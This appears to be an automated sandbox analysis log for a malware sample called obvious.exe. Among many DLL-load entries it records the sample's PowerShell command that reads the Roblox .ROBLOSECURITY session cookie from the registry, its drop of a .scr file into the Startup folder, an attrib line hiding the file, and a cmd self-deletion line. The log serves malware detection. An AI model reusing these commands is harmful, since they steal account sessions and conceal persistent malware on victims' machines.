Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\obvious.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: obvious.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: obvious.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: obvious.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation
barindex
Suspicious powershell command line found
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER Jump to behavior
Binary contains a suspicious time stamp
Source: obvious.exe Static PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BAD00BD pushad ; iretd 0_2_00007FFD9BAD00C1
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BCA69E1 push edx; retf 0_2_00007FFD9BCA73AB
Source: C:\Users\user\Desktop\obvious.exe Code function: 0_2_00007FFD9BCA6E43 push edx; retf 0_2_00007FFD9BCA73AB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD9B98D2A5 pushad ; iretd 5_2_00007FFD9B98D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD9BAA8ACC push edx; iretd 5_2_00007FFD9BAA8AEA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD9BAA8ABC push eax; iretd 5_2_00007FFD9BAA8ACA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD9BB72316 push 8B485F94h; iretd 5_2_00007FFD9BB7231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD9BAB19BA pushad ; ret 8_2_00007FFD9BAB19C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD9BB81532 pushad ; ret 10_2_00007FFD9BB81551
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFD9BAC25F4 push cs; retf 15_2_00007FFD9BAC2662
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFD9BAC285A pushad ; retf 15_2_00007FFD9BAC2882
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFD9BAC34FA pushfd ; retf 15_2_00007FFD9BAC3512
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFD9BAC28AC pushad ; retf 15_2_00007FFD9BAC28C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9BAC2604 push cs; retf 23_2_00007FFD9BAC2672
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9BAC276C push esi; retf 23_2_00007FFD9BAC2862
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9BAC276C pushad ; retf 23_2_00007FFD9BAC2892
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9BAC27A4 pushad ; retf 23_2_00007FFD9BAC2892
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9BAC34FA pushfd ; retf 23_2_00007FFD9BAC3522
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9BAC28D3 pushad ; retf 23_2_00007FFD9BAC28D9

Persistence and Installation Behavior
barindex
Drops PE files with a suspicious file extension
Source: C:\Users\user\Desktop\obvious.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr Jump to dropped file
Uses attrib.exe to hide files
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\obvious.exe"
Drops PE files
Source: C:\Users\user\Desktop\obvious.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\obvious.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr Jump to dropped file

Boot Survival
barindex
Drops PE files to the startup folder
Source: C:\Users\user\Desktop\obvious.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\Desktop\obvious.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uGCIY.scr Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\obvious.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uGCIY.scr Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr\:Zone.Identifier:$DATA Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Self deletion via cmd or bat file
Source: C:\Users\user\Desktop\obvious.exe Process created: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\obvious.exe" && pause
Source: C:\Users\user\Desktop\obvious.exe Process created: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\obvious.exe" && pause Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\obvious.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
